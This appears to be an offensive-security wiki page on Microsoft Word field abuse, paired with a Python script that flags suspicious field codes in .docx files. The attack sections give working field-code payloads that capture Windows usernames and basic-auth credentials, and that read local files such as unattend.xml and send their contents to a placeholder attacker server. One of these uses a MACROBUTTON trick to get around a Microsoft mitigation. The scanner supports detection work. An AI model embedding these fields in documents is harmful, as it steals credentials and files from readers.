# Field Abuse

Fields are a feature in MS Word for creating dynamic components that automate tasks such as updating dates or page numbering. To insert a field, go to Insert > Quick Parts > Field. You will then have a whole list of field options to choose from.

## Credential Popup

This uses an INCLUDEPICTURE field that points to a web server which replies with an HTTP basic authentication request. The URL of the INCLUDEPICTURE is made dynamic with the USERNAME field. Note that Word does not continue loading until the picture is loaded.

```
{ INCLUDEPICTURE \d "http://<ip>/{ USERNAME \* MERGEFORMAT}"\* MERGEFORMATINET }
```

*Note: your server needs to reply back with basic HTTP authentication to capture credentials*

## Arbitrary File Read

The INCLUDETEXT field reads a file and includes its contents in the document, which is how the file is read. To send the file contents back to a server, the INCLUDEPICTURE field is used.

NOTE: CVE-2002-1143 abused INCLUDETEXT and INCLUDEPICTURE to arbitrarily read a file, but Microsoft fixed this by no longer automatically updating INCLUDETEXT fields on various events.

```
{ INCLUDEPICTURE { QUOTE "http://server" & { FILENAME \p } & { INCLUDETEXT "c:\read\file.txt" } } \d }
```

To bypass this mitigation, we will use the MACROBUTTON field with the "UpdateFields" option, which will update the fields and trigger the arbitrary file read.

```
{ MACROBUTTON UpdateFields { INCLUDEPICTURE \d "http://picture.com/picture.png" \* MERGEFORMATINET}{ INCLUDEPICTURE "http://<ip>/?{ INCLUDETEXT "c:\\windows\\panther\\unattend.xml" \c XML \* MERGEFORMAT}}" \d \* MERGEFORMAT }}
```

This will make a picture-button hybrid: if the user double-clicks it and accepts a prompt, the MACROBUTTON field will update all the fields and cause the said file to be posted to our web server.
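For triaging documents, the field combinations described on this page can be recovered from a `.docx` by rebuilding the field codes stored in `word/document.xml`. The following is an added example, not part of the original page; the names `field_codes`, `findings`, `scan_docx` and `SAMPLE` are hypothetical, and the sample markup and its `example.invalid` host are constructed.

```python
import re
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{" + NS + "}"
B = '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
E = '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
T = "<w:r><w:instrText>%s</w:instrText></w:r>"
# Constructed sample (placeholder host): picture URL built from a nested USERNAME
# field, followed by a harmless PAGE field.
SAMPLE = ('<w:document xmlns:w="' + NS + '"><w:body><w:p>'
          + B + T % ' INCLUDEPICTURE \\d "http://example.invalid/'
          + B + T % " USERNAME " + E + T % '" ' + E
          + B + T % " PAGE " + E + "</w:p></w:body></w:document>")

def field_codes(document_xml):
    """Rebuild top-level field codes, with nested fields inlined as { ... }."""
    done, stack = [], []
    for el in ET.fromstring(document_xml).iter():
        kind = el.get(W + "fldCharType")
        if el.tag == W + "fldSimple":
            done.append("{ " + el.get(W + "instr", "").strip() + " }")
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
        elif el.tag == W + "fldChar" and kind == "begin":
            stack.append([])
        elif el.tag == W + "fldChar" and kind == "end" and stack:
            code = "{ " + "".join(stack.pop()).strip() + " }"
            # A nested field becomes part of its parent's instruction text.
            (stack[-1] if stack else done).append(code)
    return done

def findings(code):
    """Flag the field combinations this page describes (heuristic)."""
    up, hits = code.upper(), []
    nested = code.count("{") > 1
    if "INCLUDEPICTURE" in up and re.search(r"https?://", code, re.I) and nested:
        hits.append("remote INCLUDEPICTURE built from a nested field")
    if "INCLUDETEXT" in up:
        hits.append("INCLUDETEXT reads a file into the document")
    if re.search(r"MACROBUTTON\s+UPDATEFIELDS", up):
        hits.append("MACROBUTTON UpdateFields forces a field refresh")
    return hits

def scan_docx(path_or_file):
    """Return {field code: [findings]} for word/document.xml of a .docx."""
    with zipfile.ZipFile(path_or_file) as z:
        xml = z.read("word/document.xml")
    return {c: f for c in field_codes(xml) if (f := findings(c))}
```

Only `word/document.xml` is inspected here, so headers, footers and other parts need the same pass. For untrusted samples, parse with a hardened XML parser such as `defusedxml` instead of the standard library.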

## Resources

{% embed url="<https://www.youtube.com/watch?v=9ULzZA70Dzg&t=768s>" %}

